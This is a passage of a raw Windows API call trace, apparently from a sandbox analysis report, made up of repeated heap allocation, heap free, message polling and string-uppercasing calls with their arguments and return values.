(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0161.352] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0161.352] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0161.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0161.353] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0161.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0161.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0161.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0161.353] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0161.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0161.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0161.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0161.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0161.353] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0161.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0161.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0161.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0161.354] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0161.354] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0161.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0161.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0161.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0161.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0161.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0161.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0161.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0161.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0161.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0161.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0161.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0161.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0161.355] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0161.355] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0161.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0161.356] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0161.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0161.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0161.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0161.356] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0161.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0161.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0161.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0161.356] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0161.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0161.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0161.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0161.357] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0161.357] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0161.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0161.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0161.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0161.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0161.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0161.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.358] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0161.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0161.358] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.358] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0161.358] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0161.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0161.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0161.359] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0161.359] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0161.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0161.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0161.359] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0161.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6d0 [0161.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0161.359] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0161.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0161.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0161.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0161.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0161.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0161.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0161.360] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0161.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0161.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0161.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0161.363] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0161.363] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0161.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0161.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0161.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0161.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0161.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0161.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0161.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0161.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0161.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0161.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0161.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0161.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0161.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0161.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0161.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0161.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0161.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0161.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0161.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0161.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0161.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0161.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0161.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0161.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0161.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0161.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0161.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.366] RtlAllocateHeap 